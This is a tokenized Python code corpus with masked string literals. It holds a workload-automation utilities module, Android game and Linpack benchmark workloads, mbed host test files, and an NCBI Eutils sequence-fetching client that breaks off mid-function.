format ( * underlines ) ) <EOL> for row in rows : <EOL> wfh . write ( row_format . format ( * row ) ) <EOL> def get_null ( ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' if os . name == '<STR_LIT>' else '<STR_LIT>' <EOL> def get_traceback ( exc = None ) : <EOL> """<STR_LIT>""" <EOL> if exc is None : <EOL> exc = sys . exc_info ( ) <EOL> if not exc : <EOL> return None <EOL> tb = exc [ <NUM_LIT:2> ] <EOL> sio = StringIO ( ) <EOL> traceback . print_tb ( tb , file = sio ) <EOL> del tb <EOL> return sio . getvalue ( ) <EOL> def merge_dicts ( * args , ** kwargs ) : <EOL> if len ( args ) < <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> func = partial ( _merge_two_dicts , ** kwargs ) <EOL> return reduce ( func , args ) <EOL> def _merge_two_dicts ( base , other , list_duplicates = '<STR_LIT:all>' , match_types = False , <EOL> dict_type = dict , should_normalize = True , should_merge_lists = True ) : <EOL> """<STR_LIT>""" <EOL> merged = dict_type ( ) <EOL> base_keys = base . keys ( ) <EOL> other_keys = other . keys ( ) <EOL> norm = normalize if should_normalize else lambda x , y : x <EOL> base_only = [ ] <EOL> other_only = [ ] <EOL> both = [ ] <EOL> union = [ ] <EOL> for k in base_keys : <EOL> if k in other_keys : <EOL> both . append ( k ) <EOL> else : <EOL> base_only . append ( k ) <EOL> union . append ( k ) <EOL> for k in other_keys : <EOL> if k in base_keys : <EOL> union . append ( k ) <EOL> else : <EOL> union . append ( k ) <EOL> other_only . 
append ( k ) <EOL> for k in union : <EOL> if k in base_only : <EOL> merged [ k ] = norm ( base [ k ] , dict_type ) <EOL> elif k in other_only : <EOL> merged [ k ] = norm ( other [ k ] , dict_type ) <EOL> elif k in both : <EOL> base_value = base [ k ] <EOL> other_value = other [ k ] <EOL> base_type = type ( base_value ) <EOL> other_type = type ( other_value ) <EOL> if ( match_types and ( base_type != other_type ) and <EOL> ( base_value is not None ) and ( other_value is not None ) ) : <EOL> raise ValueError ( '<STR_LIT>' . format ( k , base_value , base_type , <EOL> other_value , other_type ) ) <EOL> if isinstance ( base_value , dict ) : <EOL> merged [ k ] = _merge_two_dicts ( base_value , other_value , list_duplicates , match_types , dict_type ) <EOL> elif isinstance ( base_value , list ) : <EOL> if should_merge_lists : <EOL> merged [ k ] = _merge_two_lists ( base_value , other_value , list_duplicates , dict_type ) <EOL> else : <EOL> merged [ k ] = _merge_two_lists ( [ ] , other_value , list_duplicates , dict_type ) <EOL> elif isinstance ( base_value , set ) : <EOL> merged [ k ] = norm ( base_value . union ( other_value ) , dict_type ) <EOL> else : <EOL> merged [ k ] = norm ( other_value , dict_type ) <EOL> else : <EOL> raise AssertionError ( '<STR_LIT>' . format ( k ) ) <EOL> return merged <EOL> def merge_lists ( * args , ** kwargs ) : <EOL> if len ( args ) < <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> func = partial ( _merge_two_lists , ** kwargs ) <EOL> return reduce ( func , args ) <EOL> def _merge_two_lists ( base , other , duplicates = '<STR_LIT:all>' , dict_type = dict ) : <EOL> """<STR_LIT>""" <EOL> if not isiterable ( base ) : <EOL> base = [ base ] <EOL> if not isiterable ( other ) : <EOL> other = [ other ] <EOL> if duplicates == '<STR_LIT:all>' : <EOL> merged_list = [ ] <EOL> for v in normalize ( base , dict_type ) + normalize ( other , dict_type ) : <EOL> if not _check_remove_item ( merged_list , v ) : <EOL> merged_list . 
append ( v ) <EOL> return merged_list <EOL> elif duplicates == '<STR_LIT>' : <EOL> base_norm = normalize ( base , dict_type ) <EOL> merged_list = normalize ( base , dict_type ) <EOL> for v in base_norm : <EOL> _check_remove_item ( merged_list , v ) <EOL> for v in normalize ( other , dict_type ) : <EOL> if not _check_remove_item ( merged_list , v ) : <EOL> if v not in base_norm : <EOL> merged_list . append ( v ) <EOL> return merged_list <EOL> elif duplicates == '<STR_LIT>' : <EOL> other_norm = normalize ( other , dict_type ) <EOL> merged_list = [ ] <EOL> for v in normalize ( base , dict_type ) : <EOL> if not _check_remove_item ( merged_list , v ) : <EOL> if v not in other_norm : <EOL> merged_list . append ( v ) <EOL> for v in other_norm : <EOL> if not _check_remove_item ( merged_list , v ) : <EOL> merged_list . append ( v ) <EOL> return merged_list <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' . format ( duplicates ) + <EOL> '<STR_LIT>' ) <EOL> def _check_remove_item ( the_list , item ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( item , basestring ) : <EOL> return False <EOL> if not item . startswith ( '<STR_LIT>' ) : <EOL> return False <EOL> actual_item = item [ <NUM_LIT:1> : ] <EOL> if actual_item in the_list : <EOL> del the_list [ the_list . index ( actual_item ) ] <EOL> return True <EOL> def normalize ( value , dict_type = dict ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , dict ) : <EOL> normalized = dict_type ( ) <EOL> for k , v in value . iteritems ( ) : <EOL> if isinstance ( k , basestring ) : <EOL> k = k . strip ( ) . lower ( ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> normalized [ k ] = normalize ( v , dict_type ) <EOL> return normalized <EOL> elif isinstance ( value , list ) : <EOL> return [ normalize ( v , dict_type ) for v in value ] <EOL> elif isinstance ( value , tuple ) : <EOL> return tuple ( [ normalize ( v , dict_type ) for v in value ] ) <EOL> else : <EOL> return value <EOL> VALUE_REGEX = re . 
compile ( r'<STR_LIT>' ) <EOL> UNITS_MAP = { <EOL> '<STR_LIT:s>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:A>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def parse_value ( value_string ) : <EOL> """<STR_LIT>""" <EOL> match = VALUE_REGEX . search ( value_string ) <EOL> if match : <EOL> vs = match . group ( <NUM_LIT:1> ) <EOL> value = float ( vs ) if '<STR_LIT:.>' in vs else int ( vs ) <EOL> us = match . group ( <NUM_LIT:2> ) <EOL> units = UNITS_MAP . get ( us , us ) <EOL> return ( value , units ) <EOL> else : <EOL> return ( value_string , None ) <EOL> def get_meansd ( values ) : <EOL> """<STR_LIT>""" <EOL> if not values : <EOL> return float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) <EOL> mean = sum ( values ) / len ( values ) <EOL> sd = math . sqrt ( sum ( [ ( v - mean ) ** <NUM_LIT:2> for v in values ] ) / len ( values ) ) <EOL> return mean , sd <EOL> def geomean ( values ) : <EOL> """<STR_LIT>""" <EOL> return reduce ( mul , values ) ** ( <NUM_LIT:1.0> / len ( values ) ) <EOL> def capitalize ( text ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return '<STR_LIT>' <EOL> return text [ <NUM_LIT:0> ] . upper ( ) + text [ <NUM_LIT:1> : ] . lower ( ) <EOL> def convert_new_lines ( text ) : <EOL> """<STR_LIT>""" <EOL> return text . replace ( '<STR_LIT:\r\n>' , '<STR_LIT:\n>' ) . replace ( '<STR_LIT:\r>' , '<STR_LIT:\n>' ) <EOL> def escape_quotes ( text ) : <EOL> """<STR_LIT>""" <EOL> return re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , text ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def escape_single_quotes ( text ) : <EOL> """<STR_LIT>""" <EOL> return re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , text ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def escape_double_quotes ( text ) : <EOL> """<STR_LIT>""" <EOL> return re . 
sub ( r'<STR_LIT>' , r'<STR_LIT>' , text ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def getch ( count = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> if os . name == '<STR_LIT>' : <EOL> import msvcrt <EOL> return '<STR_LIT>' . join ( [ msvcrt . getch ( ) for _ in xrange ( count ) ] ) <EOL> else : <EOL> import tty <EOL> import termios <EOL> fd = sys . stdin . fileno ( ) <EOL> old_settings = termios . tcgetattr ( fd ) <EOL> try : <EOL> tty . setraw ( sys . stdin . fileno ( ) ) <EOL> ch = sys . stdin . read ( count ) <EOL> finally : <EOL> termios . tcsetattr ( fd , termios . TCSADRAIN , old_settings ) <EOL> return ch <EOL> def isiterable ( obj ) : <EOL> """<STR_LIT>""" <EOL> return hasattr ( obj , '<STR_LIT>' ) and not isinstance ( obj , basestring ) <EOL> def utc_to_local ( dt ) : <EOL> """<STR_LIT>""" <EOL> return dt . replace ( tzinfo = tz . tzutc ( ) ) . astimezone ( tz . tzlocal ( ) ) <EOL> def local_to_utc ( dt ) : <EOL> """<STR_LIT>""" <EOL> return dt . replace ( tzinfo = tz . tzlocal ( ) ) . astimezone ( tz . tzutc ( ) ) <EOL> def as_relative ( path ) : <EOL> """<STR_LIT>""" <EOL> path = os . path . splitdrive ( path ) [ <NUM_LIT:1> ] <EOL> return path . lstrip ( os . sep ) <EOL> def get_cpu_mask ( cores ) : <EOL> """<STR_LIT>""" <EOL> mask = <NUM_LIT:0> <EOL> for i in cores : <EOL> mask |= <NUM_LIT:1> << i <EOL> return '<STR_LIT>' . format ( mask ) <EOL> def load_class ( classpath ) : <EOL> """<STR_LIT>""" <EOL> modname , clsname = classpath . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> return getattr ( __import__ ( modname ) , clsname ) <EOL> def get_pager ( ) : <EOL> """<STR_LIT>""" <EOL> pager = os . 
getenv ( '<STR_LIT>' ) <EOL> if pager is None : <EOL> pager = find_executable ( '<STR_LIT>' ) <EOL> if pager is None : <EOL> pager = find_executable ( '<STR_LIT>' ) <EOL> return pager <EOL> def enum_metaclass ( enum_param , return_name = False , start = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> class __EnumMeta ( type ) : <EOL> def __new__ ( mcs , clsname , bases , attrs ) : <EOL> cls = type . __new__ ( mcs , clsname , bases , attrs ) <EOL> values = getattr ( cls , enum_param , [ ] ) <EOL> if return_name : <EOL> for name in values : <EOL> setattr ( cls , name , name ) <EOL> else : <EOL> if isinstance ( values , list ) or isinstance ( values , tuple ) : <EOL> for i , name in enumerate ( values ) : <EOL> setattr ( cls , name , i + start ) <EOL> else : <EOL> for name in values : <EOL> setattr ( cls , name , values [ name ] ) <EOL> return cls <EOL> return __EnumMeta <EOL> def which ( name ) : <EOL> """<STR_LIT>""" <EOL> if os . name == '<STR_LIT>' : <EOL> paths = os . getenv ( '<STR_LIT>' ) . split ( os . pathsep ) <EOL> exts = os . getenv ( '<STR_LIT>' ) . split ( os . pathsep ) <EOL> for path in paths : <EOL> testpath = os . path . join ( path , name ) <EOL> if os . path . isfile ( testpath ) : <EOL> return testpath <EOL> for ext in exts : <EOL> testpathext = testpath + ext <EOL> if os . path . isfile ( testpathext ) : <EOL> return testpathext <EOL> return None <EOL> else : <EOL> try : <EOL> return check_output ( [ '<STR_LIT>' , name ] ) [ <NUM_LIT:0> ] . strip ( ) <EOL> except subprocess . CalledProcessError : <EOL> return None <EOL> _bash_color_regex = re . compile ( '<STR_LIT>' ) <EOL> def strip_bash_colors ( text ) : <EOL> return _bash_color_regex . 
sub ( '<STR_LIT>' , text ) <EOL> def format_duration ( seconds , sep = '<STR_LIT:U+0020>' , order = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( seconds , timedelta ) : <EOL> td = seconds <EOL> else : <EOL> td = timedelta ( seconds = seconds ) <EOL> dt = datetime ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) + td <EOL> result = [ ] <EOL> for item in order : <EOL> value = getattr ( dt , item , None ) <EOL> if item is '<STR_LIT>' : <EOL> value -= <NUM_LIT:1> <EOL> if not value : <EOL> continue <EOL> suffix = '<STR_LIT>' if value == <NUM_LIT:1> else '<STR_LIT:s>' <EOL> result . append ( '<STR_LIT>' . format ( value , item , suffix ) ) <EOL> return sep . join ( result ) <EOL> def get_article ( word ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' if word [ <NUM_LIT:0> ] in '<STR_LIT>' else '<STR_LIT:a>' <EOL> def get_random_string ( length ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . join ( random . choice ( string . ascii_letters + string . digits ) for _ in xrange ( length ) ) <EOL> class LoadSyntaxError ( Exception ) : <EOL> def __init__ ( self , message , filepath , lineno ) : <EOL> super ( LoadSyntaxError , self ) . __init__ ( message ) <EOL> self . filepath = filepath <EOL> self . lineno = lineno <EOL> def __str__ ( self ) : <EOL> message = '<STR_LIT>' <EOL> return message . format ( self . filepath , self . lineno , self . message ) <EOL> RAND_MOD_NAME_LEN = <NUM_LIT:30> <EOL> BAD_CHARS = string . punctuation + string . whitespace <EOL> TRANS_TABLE = string . maketrans ( BAD_CHARS , '<STR_LIT:_>' * len ( BAD_CHARS ) ) <EOL> def to_identifier ( text ) : <EOL> """<STR_LIT>""" <EOL> return re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , text . 
translate ( TRANS_TABLE ) ) <EOL> def load_struct_from_python ( filepath = None , text = None ) : <EOL> """<STR_LIT>""" <EOL> if not ( filepath or text ) or ( filepath and text ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> try : <EOL> if filepath : <EOL> modname = to_identifier ( filepath ) <EOL> mod = imp . load_source ( modname , filepath ) <EOL> else : <EOL> modname = get_random_string ( RAND_MOD_NAME_LEN ) <EOL> while modname in sys . modules : <EOL> modname = get_random_string ( RAND_MOD_NAME_LEN ) <EOL> mod = imp . new_module ( modname ) <EOL> exec text in mod . __dict__ <EOL> return dict ( ( k , v ) <EOL> for k , v in mod . __dict__ . iteritems ( ) <EOL> if not k . startswith ( '<STR_LIT:_>' ) ) <EOL> except SyntaxError as e : <EOL> raise LoadSyntaxError ( e . message , filepath , e . lineno ) <EOL> def load_struct_from_yaml ( filepath = None , text = None ) : <EOL> """<STR_LIT>""" <EOL> if not ( filepath or text ) or ( filepath and text ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> try : <EOL> if filepath : <EOL> with open ( filepath ) as fh : <EOL> return yaml . load ( fh ) <EOL> else : <EOL> return yaml . load ( text ) <EOL> except yaml . YAMLError as e : <EOL> lineno = None <EOL> if hasattr ( e , '<STR_LIT>' ) : <EOL> lineno = e . problem_mark . line <EOL> raise LoadSyntaxError ( e . message , filepath = filepath , lineno = lineno ) <EOL> def load_struct_from_file ( filepath ) : <EOL> """<STR_LIT>""" <EOL> extn = os . path . splitext ( filepath ) [ <NUM_LIT:1> ] . lower ( ) <EOL> if ( extn == '<STR_LIT>' ) or ( extn == '<STR_LIT>' ) or ( extn == '<STR_LIT>' ) : <EOL> return load_struct_from_python ( filepath ) <EOL> elif extn == '<STR_LIT>' : <EOL> return load_struct_from_yaml ( filepath ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' . format ( extn , filepath ) ) <EOL> def unique ( alist ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for item in alist : <EOL> if item not in result : <EOL> result . 
append ( item ) <EOL> return result <EOL> def open_file ( filepath ) : <EOL> """<STR_LIT>""" <EOL> if os . name == '<STR_LIT>' : <EOL> return os . startfile ( filepath ) <EOL> elif sys . platform == '<STR_LIT>' : <EOL> return subprocess . call ( [ '<STR_LIT>' , filepath ] ) <EOL> else : <EOL> return subprocess . call ( [ '<STR_LIT>' , filepath ] ) <EOL> def ranges_to_list ( ranges_string ) : <EOL> """<STR_LIT>""" <EOL> values = [ ] <EOL> for rg in ranges_string . split ( '<STR_LIT:U+002C>' ) : <EOL> if '<STR_LIT:->' in rg : <EOL> first , last = map ( int , rg . split ( '<STR_LIT:->' ) ) <EOL> values . extend ( xrange ( first , last + <NUM_LIT:1> ) ) <EOL> else : <EOL> values . append ( int ( rg ) ) <EOL> return values <EOL> def list_to_ranges ( values ) : <EOL> """<STR_LIT>""" <EOL> range_groups = [ ] <EOL> for _ , g in groupby ( enumerate ( values ) , lambda ( i , x ) : i - x ) : <EOL> range_groups . append ( map ( itemgetter ( <NUM_LIT:1> ) , g ) ) <EOL> range_strings = [ ] <EOL> for group in range_groups : <EOL> if len ( group ) == <NUM_LIT:1> : <EOL> range_strings . append ( str ( group [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> range_strings . append ( '<STR_LIT>' . format ( group [ <NUM_LIT:0> ] , group [ - <NUM_LIT:1> ] ) ) <EOL> return '<STR_LIT:U+002C>' . join ( range_strings ) <EOL> def list_to_mask ( values , base = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> for v in values : <EOL> base |= ( <NUM_LIT:1> << v ) <EOL> return base <EOL> def mask_to_list ( mask ) : <EOL> """<STR_LIT>""" <EOL> size = len ( bin ( mask ) ) - <NUM_LIT:2> <EOL> return [ size - i - <NUM_LIT:1> for i in xrange ( size ) <EOL> if mask & ( <NUM_LIT:1> << size - i - <NUM_LIT:1> ) ] <EOL> def sha256 ( path , chunk = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> h = hashlib . sha256 ( ) <EOL> with open ( path , '<STR_LIT:rb>' ) as fh : <EOL> buf = fh . read ( chunk ) <EOL> while buf : <EOL> h . update ( buf ) <EOL> buf = fh . read ( chunk ) <EOL> return h . 
hexdigest ( ) <EOL> def urljoin ( * parts ) : <EOL> return '<STR_LIT:/>' . join ( p . rstrip ( '<STR_LIT:/>' ) for p in parts ) </s>
<s> import time <EOL> from wlauto import GameWorkload , Parameter <EOL> class EpicCitadel ( GameWorkload ) : <EOL> name = '<STR_LIT>' <EOL> description = """<STR_LIT>""" <EOL> package = '<STR_LIT>' <EOL> activity = '<STR_LIT>' <EOL> install_timeout = <NUM_LIT> <EOL> parameters = [ <EOL> Parameter ( '<STR_LIT>' , kind = int , default = <NUM_LIT> , <EOL> description = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) , <EOL> ] <EOL> def run ( self , context ) : <EOL> super ( EpicCitadel , self ) . run ( context ) <EOL> time . sleep ( self . duration ) </s>
<s> import re <EOL> from wlauto import AndroidUiAutoBenchmark , Parameter <EOL> class RealLinpack ( AndroidUiAutoBenchmark ) : <EOL> name = '<STR_LIT>' <EOL> description = """<STR_LIT>""" <EOL> package = '<STR_LIT>' <EOL> activity = '<STR_LIT>' <EOL> parameters = [ <EOL> Parameter ( '<STR_LIT>' , kind = int , default = <NUM_LIT:16> , constraint = lambda x : x > <NUM_LIT:0> , <EOL> description = '<STR_LIT>' ) , <EOL> ] <EOL> def __init__ ( self , device , ** kwargs ) : <EOL> super ( RealLinpack , self ) . __init__ ( device , ** kwargs ) <EOL> self . uiauto_params [ '<STR_LIT>' ] = self . max_threads <EOL> self . run_timeout = <NUM_LIT> + <NUM_LIT> * self . max_threads <EOL> def update_result ( self , context ) : <EOL> super ( RealLinpack , self ) . update_result ( context ) <EOL> score_regex = re . compile ( r'<STR_LIT>' ) <EOL> match_found = False <EOL> with open ( self . logcat_log ) as logcat_file : <EOL> for line in logcat_file : <EOL> match = re . search ( score_regex , line ) <EOL> if match : <EOL> number_of_threads = match . group ( <NUM_LIT:1> ) <EOL> score = match . group ( <NUM_LIT:2> ) <EOL> context . result . add_metric ( '<STR_LIT>' , number_of_threads , None ) <EOL> context . result . add_metric ( '<STR_LIT>' , score , '<STR_LIT>' ) <EOL> match_found = True <EOL> break <EOL> if not match_found : <EOL> self . logger . warning ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from time import time <EOL> from mbed_host_tests import BaseHostTest <EOL> class WaitusTest ( BaseHostTest ) : <EOL> """<STR_LIT>""" <EOL> __result = None <EOL> DEVIATION = <NUM_LIT> <EOL> ticks = [ ] <EOL> def _callback_exit ( self , key , value , timeout ) : <EOL> self . notify_complete ( ) <EOL> def _callback_tick ( self , key , value , timestamp ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" + str ( timestamp ) ) <EOL> self . ticks . append ( ( key , value , timestamp ) ) <EOL> def setup ( self ) : <EOL> self . register_callback ( '<STR_LIT>' , self . _callback_exit ) <EOL> self . register_callback ( '<STR_LIT>' , self . _callback_tick ) <EOL> def result ( self ) : <EOL> def sub_timestamps ( t1 , t2 ) : <EOL> delta = t1 - t2 <EOL> deviation = abs ( delta - <NUM_LIT:1.0> ) <EOL> return deviation <= self . DEVIATION <EOL> timestamps = [ timestamp for _ , _ , timestamp in self . ticks ] <EOL> self . log ( str ( timestamps ) ) <EOL> m = map ( sub_timestamps , timestamps [ <NUM_LIT:1> : ] , timestamps [ : - <NUM_LIT:1> ] ) <EOL> self . log ( str ( m ) ) <EOL> self . __result = all ( m ) <EOL> return self . __result <EOL> def teardown ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from multiprocessing import freeze_support <EOL> from mbed_host_tests import init_host_test_cli_params <EOL> from mbed_host_tests . host_tests_runner . host_test_default import DefaultTestSelector <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> freeze_support ( ) <EOL> result = - <NUM_LIT:2> <EOL> test_selector = DefaultTestSelector ( init_host_test_cli_params ( ) ) <EOL> try : <EOL> result = test_selector . execute ( ) <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> test_selector . finish ( ) <EOL> result = - <NUM_LIT:3> <EOL> raise <EOL> else : <EOL> test_selector . finish ( ) <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import logging <EOL> import optparse <EOL> import time <EOL> import urllib <EOL> import urllib2 <EOL> import httplib <EOL> import re <EOL> class Eutils : <EOL> def __init__ ( self , options , logger ) : <EOL> self . logger = logger <EOL> self . base = "<STR_LIT>" <EOL> self . query_string = options . query_string <EOL> self . dbname = options . dbname <EOL> if options . outname : <EOL> self . outname = options . outname <EOL> else : <EOL> self . outname = '<STR_LIT>' + '<STR_LIT:.>' + self . dbname + '<STR_LIT>' <EOL> self . ids = [ ] <EOL> self . retmax_esearch = <NUM_LIT> <EOL> self . retmax_efetch = <NUM_LIT:1000> <EOL> self . count = <NUM_LIT:0> <EOL> self . webenv = "<STR_LIT>" <EOL> self . query_key = "<STR_LIT>" <EOL> def retrieve ( self ) : <EOL> """<STR_LIT:U+0020>""" <EOL> self . get_count_value ( ) <EOL> self . get_uids_list ( ) <EOL> self . get_sequences ( ) <EOL> def get_count_value ( self ) : <EOL> """<STR_LIT>""" <EOL> self . logger . info ( "<STR_LIT>" % self . base ) <EOL> self . logger . info ( "<STR_LIT>" % <EOL> ( self . query_string , self . dbname ) ) <EOL> querylog = self . esearch ( self . dbname , self . query_string , '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT:count>" ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> for line in querylog : <EOL> self . logger . debug ( line . rstrip ( ) ) <EOL> if '<STR_LIT>' in line : <EOL> self . count = int ( line [ line . find ( '<STR_LIT>' ) + len ( '<STR_LIT>' ) : line . find ( '<STR_LIT>' ) ] ) <EOL> self . logger . info ( "<STR_LIT>" % self . count ) <EOL> def get_uids_list ( self ) : <EOL> """<STR_LIT>""" <EOL> retmax = self . retmax_esearch <EOL> if ( self . count > retmax ) : <EOL> num_batches = ( self . count / retmax ) + <NUM_LIT:1> <EOL> else : <EOL> num_batches = <NUM_LIT:1> <EOL> self . logger . info ( "<STR_LIT>" % retmax ) <EOL> self . logger . info ( "<STR_LIT>" % num_batches ) <EOL> for n in range ( num_batches ) : <EOL> querylog = self . 
esearch ( self . dbname , self . query_string , n * retmax , retmax , '<STR_LIT>' ) <EOL> for line in querylog : <EOL> if '<STR_LIT>' in line and '<STR_LIT>' in line : <EOL> uid = ( line [ line . find ( '<STR_LIT>' ) + len ( '<STR_LIT>' ) : line . find ( '<STR_LIT>' ) ] ) <EOL> self . ids . append ( uid ) <EOL> self . logger . info ( "<STR_LIT>" % len ( self . ids ) ) <EOL> def esearch ( self , db , term , retstart , retmax , rettype ) : <EOL> url = self . base + "<STR_LIT>" <EOL> self . logger . debug ( "<STR_LIT>" % url ) <EOL> values = { '<STR_LIT>' : db , <EOL> '<STR_LIT>' : term , <EOL> '<STR_LIT>' : rettype , <EOL> '<STR_LIT>' : retstart , <EOL> '<STR_LIT>' : retmax } <EOL> data = urllib . urlencode ( values ) <EOL> self . logger . debug ( "<STR_LIT>" % str ( data ) ) <EOL> req = urllib2 . Request ( url , data ) <EOL> response = urllib2 . urlopen ( req ) <EOL> querylog = response . readlines ( ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> return querylog <EOL> def epost ( self , db , ids ) : <EOL> url = self . base + "<STR_LIT>" <EOL> self . logger . debug ( "<STR_LIT>" % url ) <EOL> values = { '<STR_LIT>' : db , <EOL> '<STR_LIT:id>' : ids } <EOL> data = urllib . urlencode ( values ) <EOL> req = urllib2 . Request ( url , data ) <EOL> req = urllib2 . Request ( url , data ) <EOL> serverResponse = False <EOL> while not serverResponse : <EOL> try : <EOL> response = urllib2 . urlopen ( req ) <EOL> serverResponse = True <EOL> except : <EOL> e = sys . exc_info ( ) [ <NUM_LIT:0> ] <EOL> self . logger . info ( "<STR_LIT>" % e ) <EOL> self . logger . info ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> querylog = response . readlines ( ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> for line in querylog : <EOL> self . logger . debug ( line . rstrip ( ) ) <EOL> if '<STR_LIT>' in line : <EOL> self . query_key = str ( line [ line . find ( '<STR_LIT>' ) + len ( '<STR_LIT>' ) : line . find ( '<STR_LIT>' ) ] ) <EOL> if '<STR_LIT>' in line : <EOL> self . 
webenv = str ( line [ line . find ( '<STR_LIT>' ) + len ( '<STR_LIT>' ) : line . find ( '<STR_LIT>' ) ] ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> self . logger . debug ( "<STR_LIT>" % self . query_key ) <EOL> self . logger . debug ( "<STR_LIT>" % self . webenv ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def efetch ( self , db , query_key , webenv ) : <EOL> url = self . base + "<STR_LIT>" <EOL> self . logger . debug ( "<STR_LIT>" % url ) <EOL> values = { '<STR_LIT>' : db , <EOL> '<STR_LIT>' : query_key , <EOL> '<STR_LIT>' : webenv , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT:text>" } <EOL> data = urllib . urlencode ( values ) <EOL> req = urllib2 . Request ( url , data ) <EOL> self . logger . debug ( "<STR_LIT>" % str ( data ) ) <EOL> req = urllib2 . Request ( url , data ) <EOL> serverTransaction = False <EOL> counter = <NUM_LIT:0> <EOL> while not serverTransaction : <EOL> counter += <NUM_LIT:1> <EOL> self . logger . info ( "<STR_LIT>" % ( counter ) ) <EOL> try : <EOL> response = urllib2 . urlopen ( req ) <EOL> fasta = response . read ( ) <EOL> if ( "<STR_LIT>" in fasta ) or ( not fasta . startswith ( "<STR_LIT:>>" ) ) : <EOL> serverTransaction = False <EOL> else : <EOL> serverTransaction = True <EOL> except urllib2 . HTTPError as e : <EOL> serverTransaction = False <EOL> self . logger . info ( "<STR_LIT>" % ( e . code , e . read ( ) ) ) <EOL> except httplib . IncompleteRead as e : <EOL> serverTransaction = False <EOL> self . logger . info ( "<STR_LIT>" % ( e . partial ) ) <EOL> fasta = self . sanitiser ( self . dbname , fasta ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> return fasta <EOL> def sanitiser ( self , db , fastaseq ) : <EOL> if db not in "<STR_LIT>" : return fastaseq <EOL> regex = re . compile ( r"<STR_LIT>" ) <EOL> sane_seqlist = [ ] <EOL> seqlist = fastaseq . split ( "<STR_LIT>" ) <EOL> for seq in seqlist [ : - <NUM_LIT:1> ] : <EOL> fastalines = seq . 
split ( "<STR_LIT:\n>" ) <EOL> if len ( fastalines ) < <NUM_LIT:2> : <EOL> self . logger . info ( "<STR_LIT>" % ( "<STR_LIT:|>" . join ( fastalines [ <NUM_LIT:0> ] . split ( "<STR_LIT:|>" ) [ : <NUM_LIT:4> ] ) ) ) <EOL> self . logger . info ( "<STR_LIT>" % ( "<STR_LIT:|>" . join ( fastalines [ <NUM_LIT:0> ] . split ( "<STR_LIT:|>" ) [ : <NUM_LIT:4> ] ) ) ) <EOL> continue <EOL> if db == "<STR_LIT>" : <EOL> badnuc = <NUM_LIT:0> <EOL> for nucleotide in fastalines [ <NUM_LIT:1> ] : <EOL> if nucleotide not in "<STR_LIT>" : <EOL> badnuc += <NUM_LIT:1> <EOL> if float ( badnuc ) / len ( fastalines [ <NUM_LIT:1> ] ) > <NUM_LIT> : <EOL> self . logger . info ( "<STR_LIT>" % ( float ( badnuc ) / len ( fastalines [ <NUM_LIT:1> ] ) , "<STR_LIT:|>" . join ( fastalines [ <NUM_LIT:0> ] . split ( "<STR_LIT:|>" ) [ : <NUM_LIT:4> ] ) , fastalines [ <NUM_LIT:1> ] ) ) <EOL> self . logger . info ( "<STR_LIT>" % ( fastalines [ <NUM_LIT:0> ] . split ( "<STR_LIT:|>" ) [ : <NUM_LIT:4> ] ) ) <EOL> continue <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) [ : <NUM_LIT:100> ] <EOL> cleanseq = "<STR_LIT:\n>" . join ( fastalines ) <EOL> sane_seqlist . append ( cleanseq ) <EOL> elif db == "<STR_LIT>" : 